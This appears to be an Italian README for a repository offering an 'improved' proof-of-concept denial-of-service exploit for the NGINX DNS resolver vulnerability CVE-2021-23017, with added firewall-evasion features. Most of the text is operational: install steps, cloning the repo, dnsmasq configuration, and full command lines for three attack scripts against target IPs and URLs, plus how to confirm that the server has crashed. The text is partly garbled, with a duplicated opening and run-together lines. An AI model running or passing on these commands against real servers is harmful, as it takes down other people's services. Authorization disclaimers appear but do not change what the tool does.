
vulnerabilità nei server NGINX (versioni 0.6.18–1.20.0). Gli script mirano a causare un Denial of Service (DoS) inviando risposte DNS maligne, con miglioramenti per aggirare i firewall.
vulnerabilità nei server NGINX (versioni 0.6.18–1.20.0). Gli script mirano a causare un Denial of Service (DoS) inviando risposte DNS malevole, con miglioramenti per bypassare i firewall. Questa è una versione migliorata del PoC originale da M507/CVE-2021-23017-PoC .
Avvertenza: Utilizzare solo con esplicita autorizzazione scritta del proprietario del sistema. I test non autorizzati sono illegali.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) per crashare il server NGINX.curl e dig per sfruttare la vulnerabilità.Rispetto a M507/CVE-2021-23017-PoC:
poc1.2.3.py per sniffing, invio DNS e attivazione query simultanei, devi eseguire i tre insieme.Esegui i tre insieme ed esegui con gli argomenti appropriati (sostituisci <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Consigliato)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Controlla lo stato del server:
curl -I http://<target_url>
502 Bad Gateway o 503 Service Unavailable indica un crash del server.200 OK suggerisce assenza di vulnerabilità o blocco firewall.Monitora il traffico DNS:
sudo wireshark -f "udp port 53"
Dichiarazione di non responsabilità: Solo a scopo educativo. Gli autori non sono responsabili per un uso improprio.